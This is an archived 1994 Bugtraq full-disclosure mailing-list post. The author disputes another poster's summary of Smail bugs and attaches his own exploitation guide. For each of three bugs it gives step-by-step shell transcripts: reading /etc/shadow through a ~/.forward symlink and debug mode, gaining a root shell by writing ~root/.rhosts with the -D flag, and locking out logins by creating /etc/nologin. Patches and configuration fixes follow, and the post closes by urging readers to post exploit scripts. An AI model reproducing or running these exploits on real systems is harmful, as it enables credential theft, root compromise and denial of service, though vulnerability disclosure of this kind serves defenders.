home | help | back | first | fref | pref | prev | next | nref | lref | last | post |
Received: from PACIFIC-CARRIER-ANNEX.MIT.EDU by po6.MIT.EDU (5.61/4.7) id AA18183; Sun, 9 Oct 94 09:09:33 EDT Received: from villa.fc.net by MIT.EDU with SMTP id AA23813; Sun, 9 Oct 94 09:09:33 EDT Received: from freeside.fc.net (freeside.fc.net [198.6.198.2]) by villa.fc.net (8.6.8.1/8.6.6) with ESMTP id CAA15079 for <bugtraq-outgoing@villa.fc.net>; Sun, 9 Oct 1994 02:14:24 -0500 Received: (from majordom@localhost) by freeside.fc.net (8.6.8.1/8.6.6) id CAA07742 for bugtraq-outgoing@villa.fc.net; Sun, 9 Oct 1994 02:15:22 -0500 Received: from altair.csustan.edu (altair.csustan.edu [130.17.1.50]) by freeside.fc.net (8.6.8.1/8.6.6) with SMTP id CAA07722 for <bugtraq@fc.net>; Sun, 9 Oct 1994 02:14:53 -0500 Received: by altair.csustan.edu (4.1/1.12) id AA29110; Sun, 9 Oct 94 00:09:02 PDT Date: Sun, 9 Oct 94 00:09:02 PDT From: xcelsior@altair.csustan.edu (Excelsior) Message-Id: <9410090709.AA29110@altair.csustan.edu> To: bugtraq@fc.net Subject: Re: 3 SMAIL BUGS Sender: bugtraq-owner@crimelab.com Precedence: bulk aleph1@dfw.net (Aleph One) spewed.... >Ok for all of you asking which are the 3 >here is the count down: > >Number 3 - The SMTP DEBUG problem. Anyone can > telnet to your SMTP port and read any > file on the system. You are exaggerating the problem. To exploit this, you have to have an account on the local machine (in order to create the ~/.forward link). Not just "anyone" can exploit it. > Fixed by adding > -smtp_debug in your smail config file. Wrong wrong wrong! All the -smtp_debug flag does is keep you from exploiting it by telnetting directly to the smtp port. There is an easier way to exploit it. >Number 2 - The .forward problem. Another > configuration problem. Smail does not > check file atributes when delivering mail ^^^^^^^^^^^^^^ Wrong again. It does checks the file attributes, but not the attributes of the DIRECTORY you are trying to create the file in - thus causing the problem. > to a file pointed to by a .forward. Fixed > by adding the check_path attribute to the > forward file director. > >and > >Number 1 - Debug file bug. Smail create or append to > anyfile using the debug options! How about explaining those bugs in detail? If I wanted to hear "There is a bug" with no explaination, I'd read CERT. Maybe you don't know how the bugs work, but if you do, don't be a WUSS - post it! >There. What I said will fix #1 and #2. Nope, what you said will definitely NOT fix #1 or #3. You can fix #2 as you described, but you weren't very specific about it, were you? > Several different > patches have been posted for #3 on usenet. Check > comp.mail.smail and the comp.is.linux.* newsgroups. > Also the maintainers of smail will fixed RSN. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Isn't that a little harsh? How about just giving them a course in writing secure Setuid programs. :) Ok, now everyone repeat after me: BUGTRAQ IS A FULL DISCLOSURE LIST That's right. FULL disclosure. Since all the elite cracker pussies are too scared to describe their bugs in detail, I will. I am including a security doc on smail that I wrote a little while ago. I'm sure most of the cracker dudes got it from my DocServer and FTP site, so here it comes to the rest of you. I hope this encourages more people to stop being childish and post your bugs. I'll be posting more goodies from my archives soon as well. Share and enjoy.... :) ------------------------------------------------- EXCELSIOR'S GUIDE TO SMAIL BUGS - Sept 1994 *** Bug #1 *** SYNOPSIS -------- Use of ~/.forward and debug lets a local user read any file on the system. EXAMPLE OF EXPLOITATION ----------------------- loser@possesux ~> ln -s /etc/shadow .forward loser@possesux ~> ls -la .forward lrwxrwxrwx 1 loser users 11 Sep 5 12:08 .forward -> /etc/shadow loser@possesux ~> telnet localhost smtp Trying 127.0.0.1... Connected to localhost-gw. Escape character is '^]'. 220 possesux.warez.mil Smail3.1.28.1 ready for fakemail on Mon, 5 Sep 94 12:10 PDT debug 20 250 Debugging level: 20 expn loser [lots of crap] expand_string(~/.forward, /home/loser, loser) called expand_string returns /home/loser/.forward dtd_forwardfile: opening forward file /home/loser/.forward [more crap] read 890 bytes director dotforward: matched loser, forwarded to root:h3ysk0tT.p0ss3/suxc0cKeH:8000:0:99999:7::: bin:*:8000:0:99999:7::: daemon:*:8000:0:99999:7::: nobody:*:8000:0:99999:7::: loser:xX/j0in.DaP0sSe4aNal.s3x:8000:0:99999:7::: [....] process_field: entry We have a group We have a group process_field: error: recursive address group 550 loser ... not matched quit 221 possesux.warez.mil closing connection Connection closed by foreign host. --------------- Contrary to popular belief, adding -smtp_debup to your smail config file will NOT prevent this bug from occuring. It will just prevent exploitation via the smtp port. We can just do this.... ---------- loser@possesux ~> smail -bs -v20 expand_string($primary_name Smail$version ready for fakemail on $date,(null), (null)) called expand_string returns possesux.warez.mil Smail3.1.28.1 ready for fakemail on Mon, 5 Sep 94 12:15 PDT 220 possesux.warez.mil Smail3.1.28.1 ready for fakemail on Mon, 5 Sep 94 12:15 PDT expn loser [same crap as before] expand_string(~/.forward, /home/loser, loser) called expand_string returns /home/loser/.forward dtd_forwardfile: opening forward file /home/loser/.forward [more of same crap] read 890 bytes director dotforward: matched loser, forwarded to root:h3ysk0tT.p0ss3/suxc0cKeH:8000:0:99999:7::: bin:*:8000:0:99999:7::: daemon:*:8000:0:99999:7::: nobody:*:8000:0:99999:7::: loser:xX/j0in.DaP0sSe4aNal.s3x:8000:0:99999:7::: [.....] process_field: entry We have a group We have a group process_field: error: recursive address group 550 loser ... not matched quit 221 possesux.warez.mil closing connection ---------- The easy way to fix this is to nuke the -d and -v options from smail. *** Bug #2 *** SYNOPSIS -------- Smail called with the -D flag will allow you to create and append to any file on the system. EXAMPLE OF EXPLOITATION ----------------------- loser@possesux ~> cat ~/.forward localhost loser ^D loser@possesux ~> smail -bs -D ~root/.rhosts -v20 220 possesux.warez.mil Smail3.1.28.1 ready for fakemail on Mon, 5 Sep 94 12:23 PDT expn loser 250 loser quit 221 possesux.warez.mil closing connection loser@possesux ~> rsh -l root localhost tcsh\ -i Warning: no access to tty (Bad file number). Thus no job control in this shell. # id uid=0(root) gid=0(root) -------------- Neat, huh? Patch by nuking the -D option from smail. I received the following patch recently. I haven't tested it, so use at your own risk. *** Omain.c Wed Mar 11 12:33:18 1993 --- main.c Wed Mar 11 12:59:54 1993 *************** *** 436,458 **** } - /* - * change error file to debugging file from -D option, if any - */ - - if (arg_debug_file) { - new_errfile = fopen(arg_debug_file, "a"); - if (new_errfile == NULL) { - write_log(LOG_TTY, "Warning: Cannot open debug file %s: %s\n", - arg_debug_file, strerrno(errno)); - arg_debug_file = NULL; - } else { - errfile = new_errfile; - fprintf(errfile, "\n%s: Debugging started: pid=%ld\n\n", - program, (long)getpid()); - } - } - - /* * read in the transport, router and director files, if needed * * NOTE: if queue_only is FALSE and mode is DELIVER_MAIL, --- 436,441 ---- *************** *** 525,530 **** --- 508,537 ---- if (prog_euid != REQUIRED_EUID) queue_only = TRUE; #endif + + /* + * change error file to debugging file from -D option, if any + * + * JMJ: Change location of this fragment to below the setuid/setgid + * calls to allow for use of fopen_as_user() instead of just + * fopen(). + * + * Side effect: -D now requires full pathname to debug file + */ + + if (arg_debug_file) { + new_errfile = fopen_as_user(arg_debug_file, "a", 1, real_uid, + prog_egid, 0600); + write_log(LOG_TTY, "Warning: Cannot open debug file %s: %s\n", + arg_debug_file, strerrno(errno)); + arg_debug_file = NULL; + } else { + errfile = new_errfile; + fprintf(errfile, "\n%s: Debugging started: pid=%ld\n\n", + program, (long)getpid()); + } + } /* * error processing can be other than TERMINAL only for -- *** Bug #3 *** SYNOPSIS -------- Files specified in ~/.forward can be created in any directory, regardless of it's permissions. (File is still owned by mailbox owner, however.) EXAMPLE OF EXPLOITATION ----------------------- loser@possesux ~> echo "/etc/nologin" > ~/.forward loser@possesux ~> mail -r root loser < /dev/null loser@possesux ~> echo "Site shutdown due to smail lameness" >! /etc/nologin loser@possesux ~> rlogin localhost Site shutdown due to smail lameness rlogin: connection closed. --------- Plug up this hole by adding 'check_path' to the following part of your /usr/lib/smail/transports file: --- [...] # file - deliver mail to files # # This is used implicitly when smail encounters addresses which begin with # a slash or squiggle character, such as "/usr/info/list_messages" or # perhaps "~/Mail/inbox". file: driver = appendfile, return_path, local, from, unix_from_hack; file = $user, # file is taken from address append_as_user, # use user-id associated with address expand_user, # expand ~ and $ within address check_path, #<--add this line suffix = "\n", mode = 0644 [...] --- That's it for now. If you appreciated reading this file, then consider posting your explotation scripts too. Share and enjoy! - Excelsior
home | help | back | first | fref | pref | prev | next | nref | lref | last | post |